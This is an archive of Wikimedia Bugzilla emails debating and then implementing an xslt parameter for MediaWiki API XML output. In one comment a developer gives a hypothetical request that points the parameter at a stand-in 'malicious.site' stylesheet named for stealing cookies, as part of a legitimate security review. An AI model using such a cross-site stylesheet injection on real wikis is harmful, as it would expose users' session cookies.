[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Bryan Tong Minh changed: What|Removed |Added Status|REOPENED|RESOLVED Resolution||FIXED --- Comment #19 from Bryan Tong Minh 2010-01-23 15:28:42 UTC --- r61419 -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are watching all bug changes. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #18 from Tim Starling 2010-01-17 04:53:55 UTC --- It's fine, you can revert me. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Bryan Tong Minh changed: What|Removed |Added CC||tstarl...@wikimedia.org --- Comment #17 from Bryan Tong Minh 2010-01-16 21:49:32 UTC --- I'm passing this through Tim before I apply it, as he changed the mimetype in r55749. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Reedy changed: What|Removed |Added Keywords||need-review, patch -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #16 from Bawolff 2009-11-24 03:30:21 UTC --- Created an attachment (id=6820) --> (https://bugzilla.wikimedia.org/attachment.cgi?id=6820) make it send a mime type that more browsers recognize This makes the type attribute on processing instruction, so that part is not really needed, as old mozilla will not work regardless.) -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #15 from Bawolff 2009-11-23 23:12:21 UTC --- Note, in addition, some browsers (older gecko based browsers) are strict about mime type that the xslt is sent with. Pretty please (With a cherry on top) make the xslt file be sent with a mime type of application/xml and change the This would actually make this work on a wide variaty of browsers. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #14 from Alexandre Emsenhuber [IAlex] 2009-10-02 08:41:39 UTC --- *** Bug 20939 has been marked as a duplicate of this bug. *** -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Bawolff changed: What|Removed |Added CC||bawolff...@gmail.com --- Comment #13 from Bawolff 2009-09-29 01:36:31 UTC --- Note, the parameter should add the header: not As text/xml is not recognized by all browsers (see [[w:XSLT]]). Internet explorer in paticular seems to need text/xsl . -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #12 from Tisza Gergő 2009-08-22 18:03:16 UTC --- You could add a site-wide javascript which checks if the user is on a certain page, gets the XML file via an AJAX query and adds the XSLT file, but having a query parameter for it is much more straightforward, and does not require JS code that will be downloaded by all users but never used by most. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Brion Vibber changed: What|Removed |Added CC||br...@wikimedia.org Status|RESOLVED|REOPENED Resolution|FIXED | --- Comment #11 from Brion Vibber 2009-08-22 17:20:16 UTC --- Can't the client-side processing add in the XSLT reference itself from the consumed XML? This seems unnecessary. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Roan Kattouw changed: What|Removed |Added Status|NEW |RESOLVED Resolution||FIXED -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #10 from Bryan Tong Minh 2009-07-13 21:38:30 UTC --- Done in r53194 . -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Platonides changed: What|Removed |Added CC||platoni...@gmail.com --- Comment #9 from Platonides 2009-07-11 20:20:54 UTC --- There should also be an option for using its own stylesheets (eg. user Foo can use User:Foo/skin.xls). That would need to add that extension as user-page protected. At least, the parameter should contain the namespace for future compatibility of the above use case. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Bryan Tong Minh changed: What|Removed |Added AssignedTo|roan.katt...@gmail.com |bryan.tongm...@gmail.com Status|REOPENED|NEW --- Comment #8 from Bryan Tong Minh 2009-07-11 19:54:50 UTC --- Should the parameter be xslt= or xsl= ? Furthermore I believe that the extension should be .xsl, right? -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #7 from Roan Kattouw 2009-07-11 18:28:07 UTC --- (In reply to comment #6) > Created an attachment (id=6322) --> (https://bugzilla.wikimedia.org/attachment.cgi?id=6322) [details] > Adds xslt parameter to format=xml > > Untested patch that adds a stylesheet declaration in the form > MediaWiki:.xslt. > Patch reviewed, feel free to commit after testing. > Possible problems: > * Content-type: Does it matter for browsers which content type the stylesheet > is served with? > * Can the URL be local or is it required to be full? > * If non-existent title or invalid title is given, fails silently. It could > throw an error, but maybe it is better if simply the raw XML is given. > (Perhaps > indicate the error in a comment?) > Throwing a warning is probably best. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #6 from Bryan Tong Minh 2009-07-11 11:28:09 UTC --- Created an attachment (id=6322) --> (https://bugzilla.wikimedia.org/attachment.cgi?id=6322) Adds xslt parameter to format=xml Untested patch that adds a stylesheet declaration in the form MediaWiki:.xslt. Possible problems: * Content-type: Does it matter for browsers which content type the stylesheet is served with? * Can the URL be local or is it required to be full? * If non-existent title or invalid title is given, fails silently. It could throw an error, but maybe it is better if simply the raw XML is given. (Perhaps indicate the error in a comment?) -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #5 from Tisza Gergő 2009-07-11 09:13:40 UTC --- (In reply to comment #4) > And what if someone points to a malicious XSLT? E.g. > api.php?action=query&xslt=http://malicious.site/steal-cookies.xslt As I said in the summary, XSLT files should be restricted to the MediaWiki namespace: for example, api.php?action=query&xslt=foo could be translated to http://wiki.domain/wiki/MediaWiki:XSLT-foo.xsl"; type="text/xsl" ?>. Anyone with malicious intent and write access to the MW namespace can already pull far worse tricks. > Also, this is API. *Application* programming interface. It's not intended to > format a user-readable output. I suggest WONTFIX. And it would not format a user-readable output; it would format the exact same output with an XSLT header added. One could argue that the application is the browser in this case, were not arguments about the semantics of the A in API utterly pointless. Are there any actual drawbacks in allowing administrators to create user-readable formats of queries (with links to the relevant tools etc.) in a template-like format instead of a procedural language (JavaScript) which is much less convenient for this task? -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #4 from Victor Vasiliev 2009-07-11 06:18:18 UTC --- (In reply to comment #2) > The processing will still be done client-side: The bug opener refers to the > which could > optionally be added to the top of the XML document in order to have a direct > transformation when viewed in the web browser. > And what if someone points to a malicious XSLT? E.g. api.php?action=query&xslt=http://malicious.site/steal-cookies.xslt Also, this is API. *Application* programming interface. It's not intended to format a user-readable output. I suggest WONTFIX. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 --- Comment #3 from Tisza Gergő 2009-07-10 23:57:17 UTC --- And it does not introduce any new XSS vulnerabilities if the XSLT file must come from the MediaWiki namespace; those who can write it can make XSS attacks much easier through the site-wide JS files. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Bryan Tong Minh changed: What|Removed |Added Status|RESOLVED|REOPENED Resolution|WONTFIX | --- Comment #2 from Bryan Tong Minh 2009-07-10 14:34:10 UTC --- (In reply to comment #1) > Processing of the XML output should be done client-side, not server-side, and > certainly not in a way that introduces XSS vulnerabilities. Closing as > WONTFIX. > The processing will still be done client-side: The bug opener refers to the which could optionally be added to the top of the XML document in order to have a direct transformation when viewed in the web browser. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
[Bug 19528] XSLT parameter to API queries
https://bugzilla.wikimedia.org/show_bug.cgi?id=19528 Roan Kattouw changed: What|Removed |Added CC||roan.katt...@gmail.com Status|NEW |RESOLVED Resolution||WONTFIX --- Comment #1 from Roan Kattouw 2009-07-06 21:51:34 UTC --- Processing of the XML output should be done client-side, not server-side, and certainly not in a way that introduces XSS vulnerabilities. Closing as WONTFIX. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email --- You are receiving this mail because: --- You are on the CC list for the bug. ___ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l